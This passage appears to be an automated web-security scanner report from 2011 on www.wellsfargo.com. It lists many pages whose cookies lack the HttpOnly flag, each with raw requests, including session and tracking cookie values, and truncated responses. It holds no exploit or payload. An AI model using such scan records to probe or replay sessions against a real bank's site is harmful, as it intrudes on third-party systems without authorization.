Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 12036
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Mutual Fund Center ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/retirement/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 9837
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/retirement/openira/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open an IRA (Individual Retire ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/about/fdic HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:08 GMT
Content-length: 9678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/applications/inprogress HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:07 GMT Content-length: 4747 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:05 GMT Content-length: 6663 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:06 GMT Content-length: 6816 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
The following cookie was issued by the application and does not have the HttpOnly flag set:
ISD_WCM_COOKIE=2079611658.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Location: https://www.wellsfargo.com/locator/ Set-Cookie: ISD_WCM_COOKIE=2079611658.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/atm/preSearch HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-type: text/html Cache-Control: no-cache="Set-Cookie" Location: https://www.wellsfargo.com/locator/atm/search Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/atm/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:17 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:41 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:43 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/ Content-Language: en Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /online_brokerage/education/trading/volatile/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /per/more/banking HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:39 GMT Content-length: 10949 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Banking Overview</ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /per/more/loans_credit HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:40 GMT Content-length: 10611 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personal_credit/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:47 GMT Content-length: 7834 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head> <title>Wells Fargo - Personal C ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo ... Rate & Payment ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7654 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy & Security ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/fraud/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 7546 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/fraud/report/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 6368 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/fraud/report/fraud HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 5794 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_security/online/guarantee HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/HE_selector HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:58 GMT Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products_services/applications_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
